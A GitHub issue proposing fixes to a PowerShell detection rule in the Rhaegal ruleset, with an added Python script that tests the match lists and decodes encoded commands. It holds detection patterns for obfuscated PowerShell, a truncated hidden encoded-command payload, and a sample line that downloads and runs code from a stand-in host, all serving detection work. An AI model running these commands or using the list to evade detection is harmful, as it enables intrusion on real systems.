"Powershell_Execution" rule does not catch "-encodedcommand"
congtrung2k1 opened this issue · 2 comments
In the Powershell_Execution rule of ./app/utils/Dracarys/Rhaegal/rules/malicious/rules.gh, the only condition is to catch text in Data like below:
Event.EventData.Data.#text:
  - "downloadstring"
  - "downloadfile"
  - "iex"
  - "* -e *"
And there is another way to encode the command: -encodedcommand
Suggestion: Add string:
- "* -encodedcommand *"
More strings should be added:
- "FromBase64String"
- "* -File "
- " -ExecutionPolicy ByPass *"
Here is an example payload:
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhAFcALwBpAFMAaABiADkAbgBQAHcASwBmADQAZwBFAEsASQBU
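To check the gap described in this issue against sample command lines, here is an added example (not part of the Rhaegal project or of this issue) that applies the rule's original match list and the proposed one to constructed EventData.Data values and decodes the -encodedcommand argument for inspection. The matching semantics (case-insensitive; `*` patterns as shell-style wildcards over the whole field, plain strings as substring tests) are an assumption, not verified against Rhaegal's matcher.

```python
import base64
import fnmatch
import re

# Match list of the Powershell_Execution rule as quoted in the issue.
ORIGINAL_PATTERNS = ["downloadstring", "downloadfile", "iex", "* -e *"]
# The same list plus the strings the issue proposes adding.
PROPOSED_PATTERNS = ORIGINAL_PATTERNS + [
    "* -encodedcommand *", "FromBase64String", "* -File ", " -ExecutionPolicy ByPass *",
]

def matches(text, pattern):
    """Assumed semantics (not verified against Rhaegal): case-insensitive;
    a pattern containing '*' is a shell-style wildcard matched against the
    whole field, any other pattern is a plain substring test."""
    t, p = text.lower(), pattern.lower()
    return fnmatch.fnmatchcase(t, p) if "*" in p else p in t

def hits(text, patterns):
    """Return the patterns that fire on one EventData.Data value."""
    return [p for p in patterns if matches(text, p)]

def decode_encoded_command(cmdline):
    """Recover the script behind -EncodedCommand (PowerShell accepts any
    unambiguous prefix such as -e, -ec, -enc). The argument is base64 of
    UTF-16LE text. Returns None if absent or not decodable."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

# Constructed sample values, not real telemetry: a harmless Get-Date encoded
# the way PowerShell expects, in both the long and the short switch form.
ENC = base64.b64encode("Get-Date".encode("utf-16-le")).decode()
SAMPLE_LONG = f"powershell -nop -w hidden -encodedcommand {ENC}"
SAMPLE_SHORT = f"powershell -nop -w hidden -e {ENC}"
SAMPLE_PLAIN = "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/')\""

if __name__ == "__main__":
    for sample in (SAMPLE_LONG, SAMPLE_SHORT, SAMPLE_PLAIN):
        print(sample)
        print("  original rule :", hits(sample, ORIGINAL_PATTERNS))
        print("  proposed rule :", hits(sample, PROPOSED_PATTERNS))
        print("  decoded       :", decode_encoded_command(sample))
```

Under these semantics the long form is missed by the original list because "* -e *" needs a space right after "-e", while the short form and the DownloadString sample are caught.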
The embedded Rhaegal is not enough to be honest, there are a lot of options not included, but it is a sample that helps to create more custom rules.